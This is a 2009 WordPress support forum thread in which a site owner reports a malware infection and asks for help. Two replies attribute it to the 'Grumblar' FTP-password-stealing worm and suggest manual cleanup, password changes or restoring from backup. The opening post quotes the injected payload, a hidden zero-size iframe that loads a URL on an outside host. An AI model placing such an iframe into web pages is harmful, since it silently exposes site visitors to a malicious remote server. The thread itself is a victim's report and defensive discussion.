Title: Help With WordPress Vulnerability
Last modified: August 19, 2016

---

# Help With WordPress Vulnerability

 *  [calculust](https://wordpress.org/support/users/calculust/)
 * (@calculust)
 * [16 years, 11 months ago](https://wordpress.org/support/topic/help-with-wordpress-vulnerability/)
 * There is a new virus that has hit a ton of website on the web…
 * [http://www.theregister.co.uk/2009/05/30/mass_web_infection/](http://www.theregister.co.uk/2009/05/30/mass_web_infection/)
 * Mine is one of them. It somehow was able to add this code to my website…
 * `<iframe src="http://m-analytics.net/qaqa/?daf02d89f0bb66c3b4a9ff31da01e10a" 
   width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling
   =no></iframe>
 * I have no idea how they did this. I checked my Template files and can’t find 
   anything.
 * Is this happening to anyone else? Is there a fix?

Viewing 2 replies - 1 through 2 (of 2 total)

 *  [Milan Petrovic](https://wordpress.org/support/users/gdragon/)
 * (@gdragon)
 * [16 years, 11 months ago](https://wordpress.org/support/topic/help-with-wordpress-vulnerability/#post-1118021)
 * One of my blogs on WordPress (theme files are changed as well as some WordPress
   files) and also my PHPBB 3 forum. I had to clean up files manually, and after
   that changed all passwords and so far everything is fine.
 *  [Matt McInvale](https://wordpress.org/support/users/mcinvale/)
 * (@mcinvale)
 * [16 years, 11 months ago](https://wordpress.org/support/topic/help-with-wordpress-vulnerability/#post-1118022)
 * Looks like Grumblar, no fun. It steals your FTP passwords and modifies files 
   you have access to. Your best bet is recovering from a recent backup.
 * I’ve seen it hit index.php, wp-config.php and wp-includes/default-filters.php.
   Although it’s possible that it can modify anything.

Viewing 2 replies - 1 through 2 (of 2 total)

The topic ‘Help With WordPress Vulnerability’ is closed to new replies.

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 2 replies
 * 3 participants
 * Last reply from: [Matt McInvale](https://wordpress.org/support/users/mcinvale/)
 * Last activity: [16 years, 11 months ago](https://wordpress.org/support/topic/help-with-wordpress-vulnerability/#post-1118022)
 * Status: not resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics